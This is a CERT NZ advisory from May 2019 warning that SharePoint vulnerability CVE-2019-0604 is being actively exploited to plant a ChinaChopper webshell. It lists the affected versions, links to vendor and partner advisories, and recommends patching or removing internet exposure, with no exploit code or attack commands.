Microsoft SharePoint vulnerability being exploited

Our advisories highlight current cyber security threats and vulnerabilities in New Zealand, and provide guidance on how to mitigate their impact.

Subscribe to our updates to be notified as soon as we publish an advisory.

3:30pm, 13 May 2019

TLP Rating: Clear

Microsoft SharePoint vulnerability being exploited

Earlier this year researchers published a remote code execution vulnerability against Microsoft SharePoint servers. This vulnerability is now being actively exploited to deploy a variant of the ChinaChopper webshell to gain access to organisations.

Microsoft has released patches for all vulnerable versions.

What's happening

Systems affected

Microsoft SharePoint vulnerability CVE-2019-0604 is being actively exploited by attackers.

Microsoft released patches for this vulnerability in security updates earlier this year, however any system that remains unpatched is vulnerable to this attack.

The following SharePoint servers are vulnerable if unpatched:

  • Microsoft SharePoint Enterprise Server 2016
  • Microsoft SharePoint Foundation 2010 Service Pack 2
  • Microsoft SharePoint Foundation Service Pack 1
  • Microsoft SharePoint Server 2010 Service Pack 2
  • Microsoft SharePoint Server 2013 Service Pack 1
  • Microsoft SharePoint Server 2019

Microsoft’s advisory on CVE-2019-0604 SharePoint remote code execution vulnerability External Link

What this means

Organisations tracking these incidents have noted that attackers compromise vulnerable SharePoint servers, and install a version of the ChinaChopper webshell. This allows attackers to carry out remote code execution attacks.

What to look for

How to tell if you're affected

The Canadian Centre for Cyber Security has published some indicators of compromise regarding this attack.

Canadian Centre for Cyber Security’s ChinaChopper malware advisory External Link

What to do

Prevention

CERT NZ recommends you patch any Microsoft SharePoint servers that are not up-to-date.

If you are unable to apply these security updates, we recommend you use other security controls to mitigate this risk – primarily ensuring your SharePoint Service is not accessible from the internet. 

More information

Microsoft’s advisory on CVE-2019-0604 SharePoint remote code execution vulnerability External Link

Zero day initiative blog from the security researcher External Link

ChinaChopper malware advisory from Canadian Centre for Cyber Security External Link

If you require more information or further support, submit a report on our website or contact us on 0800 CERTNZ.

Report an incident to CERT NZ

For media enquiries, email our media desk at certmedia@cert.govt.nz or call on 021 854 384